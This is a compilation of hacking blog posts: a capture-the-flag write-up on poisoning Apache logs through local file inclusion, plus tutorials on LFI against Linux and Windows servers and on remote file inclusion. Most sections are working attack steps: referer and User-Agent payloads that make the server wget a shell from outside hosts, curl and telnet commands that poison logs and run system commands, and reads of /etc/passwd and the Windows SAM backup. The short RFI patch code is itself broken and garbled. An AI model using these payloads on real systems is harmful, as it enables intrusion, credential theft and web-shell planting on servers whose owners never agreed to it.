Spawning a Shell by LFI Poisoning Log Files

Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge, I found one of the pages vulnerable to SQL Injection, I injected it, extracted the Admin’s Credentials and as soon as I logged in the “Admin Panel”, I found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that but they weren’t working/there. 🙁 ..

The only thing I didn’t try was LFI Log File Poisoning but It was time to unchain the beast ..
I included the “Apache HTTP Configuration file” and looked for the error/access log. Interestingly, instead of finding a .log file, I found a piped bash script ..

Spawning a Shell by LFI Poisoning Log Files

Me likey 🙂 .. Then, of course, I included the bash script. — This was it’s contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

while : ; do
 read line
 [ -z "$line" ] && exit

 DOMAIN=""
 if [[ "$line" =~ \[host:([^\]]+) ]]; then
 DOMAIN=${BASH_REMATCH[1]}
 fi
 
 if [ -n "$DOMAIN" ]; then
 echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
 chown apache:apache /var/www/html/$DOMAIN/logs/error_${DATE}.log
 else
 echo "${line}" >> /var/www/html/error_${DATE}.log
 chown apache:apache /var/www/html/error_${DATE}.log
 fi
done

What does this do? It creates a .log file in “/var/www/html/domain.tld/logs/” with the name “error_YYYY-MM-DD” & According to the Apache Config, It sent URL, Referer and time to this bash script which then saved it to the file .. So, I just had to visit a non-existent page *to get a 404* with my referer set to “<?php system(‘wget http://x.com/y.txt -O z.php’); ?>” or any of it’s equivalents .. and then include the .log file to execute the code 😉

curl -e “<?php system($_POST[‘x’]) ?>” http://domain.tld/blablabla.ext

Spawning a Shell by LFI Poisoning Log Files

curl –data “x=cat /etc/passwd” http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log

Spawning a Shell by LFI Poisoning Log Files

I guess we’re done here 😀

ps: after solving the challenge I found out the “official solution” was nothing like this, it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to sucessfully bypass that function + other image re-sizing functions .. there are various great articles written on that topic here are some of them ..

Local File Inclusion LFI On Windows Server

Local File Inclusion LFI on windows server

In previous post I showed you Local File Inclusion LFI on Linux server but today in this post i will show you how Local File Inclusion LFI on windows server. In this post I will not start with introduction for complete guide please refer my old post.

What is Local File Inclusion LFI vulnerability ?

The local file inclusion LFI is a process of Including Local File available on web server. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitized then an attacker give the some default files location and access all these sensitives files.

Here it is the vulnerable code.

<?php
 if (IsSet($_GET['page']))
 include($_GET['page']);
?>

Here we can see that the script doesn’t check for which file to be included and hence, we are free to include any file by changing the ‘page’ GET variable value.

Finding Local file Inclusion LFI vulnerability in website

Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become

www.vulnerablewebsite.com/view.php?page=../

Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

In Linux we we include /etc/passwd but in windows server we include /windows/repair/sam so this repair/sam is backup sam file

http://localhost/test.php?page=../../windows/repair/sam

So you know if not found then you will have to move directory up by using ../

So, as you all know in Local file inclusion LFI An attacker can include the sensitives file. so now let us shell the webserver.

For this we will send the some error to the logs of webserver by using a php code.

<?php passthru($_GET['cmd']); ?>

You can also exploit using the system(),exec(),shell_exec() e.t.c commands. The commands are offered by php to execute system level commands.

Here i am going to use telnet to inject malicious code as error in log files.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

so this script is saved in web server and now we will have to include it.

http://localhost/test.php?page=../logs/access.log&cmd=dir

so now we you can do any thing here after including log files. and you can execute the system level command. like,

http://localhost/test.php?page=../logs/access.log&cmd=dir
http://localhost/test.php?page=../logs/access.log&cmd=mkdir
http://localhost/test.php?page=../logs/access.log&cmd=wget

so now you can wget the shell and download in web.

Hope you enjoyed this session and learned. so thanks for reading guys. keep learning 😉

Remote File Inclusion RFI Attack

Remote File Inclusion RFI Attack

In this session you will learn how you can exploit remote file inclusion RFI vulnerability. so, lets start with basic concepts and introduction.

What Is Remote File Iinclusion ?

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript) *client sided shiZ*.

RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface *if that’s what you’re looking for 😐 * the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux.

Read More : Local File Inclusion Attack

Starting with RFI

Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks. If you can’t find one, don’t worry you’ll still learn 😀 – Just upload this on any site and save it as index.php in a folder called rfi.

<?php
# Infoseczone's RFI Tutorial @ infoseczone
$file = $_GET['file'];
if ($file != null){include($file.".html");}
?>

and save this as a tut.html

<html>
<body>
<center><h1>RFI</h1></center>
</body>
</html>

then visit http://yoursite.com/rfi/index.php?file=tut

As you can see, this code (index.php) pulls documents from the file parameter, adds .html in the end and “includes” it.
If this isn’t coded properly, the script doesn’t check where the file is coming from and so an inclusion from another site will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another site but still run on the site being targeted. Let’s Try It Out.

http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt
Warning: include(http://evilsite.com/evilscript.txt.html): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/yoursite/public_html/rfi/index.php on line 4

Just like we have the %00 to get rid of the .html part in LFI you got the “?” sign in RFI. If you go to index.php?file=http://evilsite.com/evilscript.txt? it will include evilscript.txt and not evilscript.txt.php because the ? sign makes .php an GET argument! Which does not affect which file you are requesting on remote servers.

http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt?

Patching Remote File Inclusion Vulnerability

Method One (Switch Statement)

<?php
$file = $_GET['file'];
switch($page){
        case "about":
        include("aboutus.html");
        break;
        case "contact":
        include("contactus.html");
        break;
        default: # If parameter != contact or about
        include("tut.html");
        break;}
?>

Method Two (If Statement)

<?php
$file = $_GET['file'];
if (isset($file))
{
 Â  Â  if ($file == "about")
 Â  Â  {
 Â  Â  Â  Â  Â include("aboutus.html");
 Â  Â  }
 Â  Â  elseif ($file == "contact")
 Â  Â  {
 Â  Â  Â  Â  Â include("contactus.html");

Thanks For Reading Keep learning some good stuffs 😀

Local File Inclusion (LFI) Vulnerability Attack

Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss about the local file inclusion vulnerability and how it occurs and can be patched so first let me start with introduction about file inclusion.

A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability.

What is Local File Inclusion (LFI) vulnerability ?

The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.

Finding Local file Inclusion (LFI)vulnerability in website

Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become

www.vulnerablewebsite.com/view.php?page=../|

Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request.

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

so we go more directories up..

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you will get a page like this that means you have successfully Included a /etc/passwd file.

 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

yeah we successfully included a file and our next step is to include a proc/self/environ file. so now replace /etc/passwd with /proc/self/environ file as shown below.

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this that means you have successfully included a proc/self/environ file.

 DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/pass wd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenvir
on SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at
www.vulnerablewebsite.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

Injecting a Malicious code in Local File Inclusion vulnerable website

Now let’s inject our malicious code in proc/self/environ.How we can do that? We can inject our code in User-Agent HTTP Header. Use Tamper Data Addon for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now Tamper this page and in user agent add you uploader script and then submit. after submitting you will get an uploader or /proc/self/environ page just browse and upload your shell.

You can also upload your shell by downloading remotely using wget command.

 <?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from www.shell.com/shell.txt and save it as shell.php  in the website directory) through system(), and our shell will be created.If don’t
work,try exec() because system() can be disabled on the webserver from php.ini.

Accessing our shell

Now lets check if our malicous code was successfully injected. Lets check if the shell is present.

www.vulnerablewebsite.com/shell.php

Our shell is there. Injection was succesfully.

So I think every body enjoyed this tutorial keep practising and learning. 🙂